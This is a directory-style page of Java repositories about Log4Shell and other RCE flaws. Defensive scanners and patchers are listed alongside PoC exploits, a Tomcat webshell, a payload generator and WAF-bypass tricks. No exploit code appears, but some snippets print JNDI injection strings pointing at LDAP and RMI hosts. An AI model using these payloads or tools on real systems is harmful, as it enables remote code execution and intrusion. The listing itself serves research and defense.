50 Repositories
Java log4j-rce Libraries
A webshell application and interactive shell for pentesting Apache Tomcat servers.
Apache Tomcat webshell application for RCE A webshell application and interactive shell for pentesting Apache Tomcat servers. Features Webshell plugin
A pre-authenticated RCE exploit for Inductive Automation Ignition
Randy What This is a pre-authenticated RCE exploit for Inductive Automation Ignition that impacts versions = 8.1.16. We failed to exploit the bugs at
Log4J scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) on your file-system within any application. It is able to even find Log4J instances that are hidden several layers deep. Works on Linux, Windows, and Mac, and everywhere else Java runs, too!
Log4-detector Scanner that detects vulnerable Log4J versions to help teams assess their exposure to CVE-2021-44228 (CRITICAL), CVE-2021-45046, CVE-202
An agent to hotpatch the log4j RCE from CVE-2021-44228.
Log4jHotPatch This is a tool which injects a Java agent into a running JVM process. The agent will attempt to patch the lookup() method of all loaded
Log4j-RCE (CVE-2021-44228) Proof of Concept with additional information
Log4J-RCE-Proof-Of-Concept (CVE-2021-44228) This is a proof of concept of the log4j rce. Here are some links for the CVE-2021-44228: https://www.lunas
Deploys an agent to fix CVE-2021-44228 (Log4j RCE vulnerability) in a running JVM process
-- This repository has been archived -- Further development of this tool will continue at corretto/hotpatch-for-apache-log4j2. Thanks for sharing, com
log4j2 rce、poc
Apache Log4j 2 Apache log4j2 开源日志组件远程代码执行 攻击者通过构造恶意请求,触发服务器log4j 2 日志组件的远程代码执行漏洞。漏洞无需特殊配置,经验证,最新版的补丁可以防护此问题 官方最新补丁: log4j-2.15.0-rc2 紧急处置方案 2.10 or 以上
Non intrusive log4j2 RCE vulnerability patch.
Log4j Patch Resolve the RCE vulnerability caused by JNDI lookup in log4j 2.0~2.14.1. It is licensed under the WTFPL 2.0 license, you can do anything w
Apache/Alibaba Dubbo = 2.7.3 PoC Code for CVE-2021-25641 RCE via Deserialization of Untrusted Data; Affects Versions = 2.7.6 With Different Gadgets
The 0xDABB of Doom - CVE-2021-25641-Proof-of-Concept Apache/Alibaba Dubbo = 2.7.3 PoC Code for CVE-2021-25641 RCE via Deserialization of Untrusted Da
F5 BIG-IP iControl REST vulnerability RCE exploit with Java including a testing LAB
CVE-2022-1388 F5 BIG-IP iControl REST vulnerability RCE exploit with Java and ELF. Included Scan a single target Scan many targets Exploit with a shel
A webshell application and interactive shell for pentesting Apache Tomcat servers.
Apache Tomcat webshell application for RCE A webshell application and interactive shell for pentesting Apache Tomcat servers. Features Webshell plugin
A mitigation for CVE-2021-44228 (log4shell) that works by patching the vulnerability at runtime. (Works with any vulnerable java software, tested with java 6 and newer)
Log4jPatcher A Java Agent based mitigation for Log4j2 JNDI exploits. This agent employs 2 patches: Disabling all Lookup conversions (on supported Log4
Fixes the log4j exploit from being sent to Minecraft clients.
⚠️ DEPRECATION ⚠️ Mojang has now released client updates, making this plugin obsolete. Make sure to fully restart your client. If you haven't already
spring-cloud-function SpEL RCE, Vultarget & Poc
spring-cloud-function SpEL RCE Vultarget You can build it for youself. here is the source of the Vuln App Or you can use the release which built by cc
Different Java Loggers Benchmarks.
Java Logger Benchmark JMH Benchmark for different Java Logger implementations. Idea of this benchmark is to put all loggers in the same conditions and
Apache Log4j 2 is an upgrade to Log4j that provides significant improvements over its predecessor
Apache Log4j 2 Apache Log4j 2 is an upgrade to Log4j that provides significant improvements over its predecessor, Log4j 1.x, and provides many of the
A Basic Java Application Vulnerable to the Log4Shell RCE
This is a basic, minimal, intentionally vulnerable Java web application including a version (2.14.1) of the log4j library affected by the infamous log4shell (CVE-2021-44228) vulnerability.
LOG4J Java exploit - WAF and patches bypass tricks
🤝 Show your support - give a ⭐️ if you liked the content | SHARE on Twitter | Follow me on 🐱💻 ✂️ 🤬 LOG4J Java exploit - WAF and patches bypass tr
Log4Shell Zero-Day Exploit Proof of Concept
Log4Shell Zero-Day Exploit if attacker manage to log this string ${jndi:ldap://someaddresshere/param1=value1} to log4j it somehow loads the class/java
An LDAP RCE exploit for CVE-2021-44228 Log4Shell
log4j-poc An LDAP RCE exploit for CVE-2021-44228 Log4Shell Description The demo Tomcat 8 server on port 8080 has a vulnerable app (log4shell) deployed
Removal of JndiLookup in now obsolete Minecraft versions, or versions that still have log4j 2.10 and is unable to use
NukeJndiLookupFromLog4j Removal of JndiLookup in now obsolete Minecraft versions, or versions that still have log4j 2.10 and is unable to use -Dlog4
Spring Boot Log4j - CVE-2021-44228 Docker Lab
Spring Boot Log4j - CVE-2021-44228 The Log4Shell vulnerability (CVE-2021-44228) ultimately is a quite simple JNDI Injection flaw, but in a really real
Burp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046
Log4j-HammerTime This Burp Suite Active Scanner extension validates exploitation of the Apache Log4j CVE-2021-44228 and CVE-2021-45046 vulnerabilities
Log4Shell RCE exploit using a gadget class. Not dependent on an old JDK version to work.
Log4Shell RCE exploit using a gadget class. Not dependent on an old JDK version to work.
This project will help to test the Log4j CVE-2021-44228 vulnerability.
Log4j-JNDIServer This project will help to test the Log4j CVE-2021-44228/CVE-2021-45046 vulnerabilities. Installation and Building Load the project on
CVE-2021-44228 (Log4Shell) Proof of Concept
CVE-2021-44228 (Log4Shell) Proof of Concept Apache Log4j2 =2.14.1 JNDI features used in configuration, log messages, and parameters do not protect ag
reload4j is a drop-in replacement for log4j 1.2.17
What is reload4j? The reload4j project is a fork of Apache log4j version 1.2.17. It aims to fix the most urgent issues in log4j 1.2.17 which hasn't se
CVE-2021-44228 (Apache Log4j Remote Code Execution)
CVE-2021-44228 (Apache Log4j Remote Code Execution) all log4j-core versions =2.0-beta9 and =2.14.1 The version of 1.x has other vulnerabilities, it
Log4j2Scan - Log4j2 RCE Passive Scanner plugin for BurpSuite
Log4j2Scan This tool is only for learning, research and self-examination. It should not be used for illegal purposes. All risks arising from the use o
Log4j-payload-generator - Log4j jndi injects the Payload generator
0x01 简介 log4j-payload-generator是 woodpecker框架 生产log4 jndi注入漏洞payload的插件。目前可以一键生产以下5类payload。 原始payload {[upper|lower]:x}类型随机混payload {[upper|lower]:x}
Log4shell-hunter - Scanner that scans local files for log4shell vulnerability
Log4shell-hunter - Scanner that scans local files for log4shell vulnerability. Does bytecode analysis so it does not rely on metadata. Will find vulnerable log4j even it has been self-compiled/repackaged/shaded/nested (e.g. uberjar, fatjar) and even obfuscated.
Oxygen-log4j-patcher - A tool that upgrades the log4j from an Oxygen installation to version 2.16
Oxygen XML Patch Tool for Apache Log4j vulnerability CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105 This is a tool that updates the log4j version 2
Some tools to help mitigating Apache Log4j 2 CVE-2021-44228
JndiLookup Some tool to help analyzing Apache Log4j 2 CVE-2021-44228 This tool uses the "lookup" feature from log4j-2 to test against the JNDI vulnera
CVE-2021-44228 - Apache log4j RCE quick test
Build ./build.sh Start log4j RCE Server ./start-log4j-rce-server.sh Test Run java -cp log4j-rce-1.0-SNAPSHOT-all.jar log4j Check if you get logs in ha
Log4j CVE-2021-44228 examples: Remote Code Execution (through LDAP, RMI, ...), Forced DNS queries, ...
Log4j CVE-2021-44228 and CVE-2021-45046 Requisites Use a vulnerable JDK, for instance JDK 1.8.0_181 Usage Malicious server The malicious server deploy
Log4J CVE-2021-44228 Minecraft PoC
CVE-2021-44228 in Minecraft Java 16 Paper server build #397 Minecraft 1.17.1 Exploitation In Java 16 only deserialization attacks work by default usin
Don't use this maliciously, this is for testing
log4j-exploit-example Don't use this maliciously, this is for testing Specifically for testing within Minecraft, but this will probably work on other
基于 spring-boot-starter-log4j2:2.6.1 (log4j 2.14.1)
Log4j 2 CVE-2021-44228 测试样本应用 基于 spring-boot-starter-log4j2:2.6.1 (log4j 2.14.1) 可用接口 接口 请求方法 参数 vulnerable_request_get GET v=payload vulnerable_reque
A singular file to protect as many Minecraft servers and clients as possible from the Log4j exploit (CVE-2021-44228).
MC-Log4J-Patcher The goal of this project is to provide Minecraft players, and server owners, peace of mind in regards to the recently discovered Log4
Scan and patch tool for CVE-2021-44228 and related log4j concerns.
A Log4J2 CVE-2021-44228 Vulnerability Scanner and Patcher Links to download the latest version: Linux x64 with glibc2.17+ (RHEL7+) Windows & all other
Small example repo for looking into log4j CVE-2021-44228
log4j CVE-2021-44228 Lame useless repo to look into log4j CVE-2021-44228. Setup The repository contains a .idea/ folder which is a IntelliJ IDEA proje
log4j-scanner is a project derived from other members of the open-source community by CISA's Rapid Action Force team to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities.
Log4j Scanner This repository provides a scanning solution for the log4j Remote Code Execution vulnerabilities (CVE-2021-44228 & CVE-2021-45046). The
Apache Log4j2 CVE-2021-44228 RCE Demo with RMI and LDAP
CVE-2021-44228-Demo 利用 CVE-2021-44228,通过 RMI 和 LDAP 两种方式远程注入代码的示例。 Exploit class from RMI Server loaded Hello, ${jndi:rmi://127.0.0.1:1099/exploit} Ex
Teste tcs loja REST/Endpoints/Postman/log4j/java/hibernate/H2
# Aplicativo REST API LOJA (Cliente, Produto, Pedido, Itens do Pedido) Requerimentos Para construir e executar a aplicação você precisa: JDK 11 Maven
spring boot Fat Jar 应用文件上传漏洞到 RCE 的利用技巧
spring-boot-upload-file-lead-to-rce-tricks 一. 原理文章 Spring Boot Fat Jar 写文件漏洞到稳定 RCE 的探索 二. docker 漏洞环境搭建 docker pull landgrey/spring-boot-fat-jar-writ
CVE-2021-2109 && Weblogic Server RCE via JNDI
Description Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected
Spring Boot基础教程,Spring Boot 2.x版本连载中!!!
Spring Boot基础教程 本项目内容为《Spring Boot基础教程》的程序样例。 专题目标:打造全网内容最全,比收费教程更好的Spring Boot免费教程! 加入社群:如果你正在学习Spring Boot,不妨加入我们的Spring技术交流群,一起成长! 如何支持: 关注我的公众号”程序
Captures log entries for unit testing purposes
LogCaptor Install with maven dependency groupIdio.github.hakky54/groupId artifactIdlogcaptor/artifactId version2.4.0/version
Log annotation for logging frameworks
Herald "Why, sometimes I've believed as many as six impossible things before breakfast." - Lewis Carroll, Alice in Wonderland. Herald provides a very
Apache Log4j 2 is an upgrade to Log4j that provides significant improvements over its predecessor, Log4j 1.x, and provides many of the improvements available in Logback while fixing some inherent problems in Logback's architecture.
Apache Log4j 2 Apache Log4j 2 is an upgrade to Log4j that provides significant improvements over its predecessor, Log4j 1.x, and provides many of the